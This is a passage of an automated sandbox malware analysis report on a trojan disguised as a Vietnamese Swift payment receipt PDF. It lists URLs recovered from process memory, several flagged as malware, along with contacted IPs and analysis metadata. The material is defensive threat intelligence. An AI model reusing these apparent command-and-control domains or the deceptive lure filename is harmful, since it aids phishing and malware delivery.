http://www.autonwheels.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loyalbahis356.com/pz12/www.guangdongqiangzhetc.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.loyalbahis356.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gabbygomez.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.motchillssss.top/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.jnhdh8827.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.cripmz.xyzReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/e	explorer.exe, 00000006.00000002.3366414703.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2174937509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2163845733.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nuevobajonfavorito.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.98980901.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotgame99.bet	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autonwheels.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.missorris.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ma-google.com/pz12/www.ainth.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.317wb.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gabbygomez.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ma-google.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.missorris.com/pz12/www.shrisona.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gabbygomez.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guangdongqiangzhetc.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyz/pz12/www.pureamyl.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autonwheels.com/pz12/www.slotgame99.bet	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ainth.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.317wb.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loyalbahis356.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000002.3371448733.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.come	explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000006.00000002.3366414703.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2174937509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.missorris.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guangdongqiangzhetc.com/pz12/www.nuevobajonfavorito.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guangdongqiangzhetc.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nuevobajonfavorito.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.shrisona.com/pz12/www.cripmz.xyz	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com/I	explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/	explorer.exe, 00000006.00000002.3375867224.00000000111EF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3359339239.0000000005BFF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ma-google.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guangdongqiangzhetc.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jnhdh8827.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.missorris.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.micro	explorer.exe, 00000006.00000002.3364148653.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3364126550.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2157798037.00000000028A0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ma-google.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nuevobajonfavorito.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ainth.com/pz12/www.motchillssss.top	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.motchillssss.topReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pureamyl.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.98980901.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pureamyl.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotgame99.bet/pz12/www.gabbygomez.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotgame99.betReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.98980901.com/pz12/www.autonwheels.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.motchillssss.top/pz12/www.98980901.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com-	explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.317wb.com/pz12/	explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyz/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comEMd	explorer.exe, 00000006.00000000.2180275775.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nuevobajonfavorito.com/pz12/www.jnhdh8827.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ainth.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotgame99.bet/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jnhdh8827.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
119.3.37.137	www-guangdongqiangzhetc-com.258fuwu.com	China	55990	HWCSNETHuaweiCloudServicedatacenterCN	false
185.148.106.70	www.loyalbahis356.com	Russian Federation	201341	TESONETLT	false
188.114.96.3	www.jnhdh8827.com	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1490435
Start date and time:	2024-08-09 09:21:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/6@6/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 124 Number of non-executed functions: 279
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
